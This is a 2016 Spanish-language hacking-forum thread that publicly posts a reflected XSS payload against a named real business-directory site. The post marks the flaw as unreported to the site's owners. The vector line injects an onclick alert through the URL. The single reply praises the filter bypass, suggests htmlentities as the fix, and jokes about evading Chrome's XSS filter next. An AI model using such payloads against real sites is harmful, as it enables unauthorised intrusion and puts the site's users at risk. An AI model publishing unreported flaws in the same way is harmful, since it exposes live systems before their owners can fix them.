This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

[XSS] www.iglobal.co

  • 1 Replies
  • 3602 Views

0 Members and 1 Guest are viewing this topic.

Offline rreedd

  • *
  • Underc0der
  • Posts: 113
  • Actividad:
    0%
  • Country: 00
  • Reputación 6
  • Somos Nada Señores
    • View Profile

[XSS] www.iglobal.co

  • on: December 18, 2016, 08:12:15 pm
Sitio : You are not allowed to view links. Register or Login

Descripción del sitio
: "iGlobal es un directorio online de negocios y profesionales de 60 paises del mundo" (iglobal.co)
 
   [XSS] Inyección en URL .



  Url del sitio : You are not allowed to view links. Register or Login
  Vector :  "+<h1+onclick%3D(alert('underc0de'))>sqli<%2Fh1>
  Exploit : You are not allowed to view links. Register or Login
  Reportado : NO
  Autor : RREEDD

Offline GGZ

  • *
  • Underc0der
  • Posts: 51
  • Actividad:
    0%
  • Reputación 0
  • COME AT ME BRAAAAH.
    • View Profile

Re: [XSS] www.iglobal.co

  • on: December 19, 2016, 12:40:57 am
Jajaja, buen XSS, salteaste el filtro que tenía.

Hablando de esos filtros, ¿no es mejor directamente usar htmlentities?, que todo ese filtro que al final siempre se lo termina salteando la mayoría de veces.

Ahora te queda saltear el filtro de Google Chrome

Saludos!
« Last Edit: December 19, 2016, 12:42:46 am by GGZ »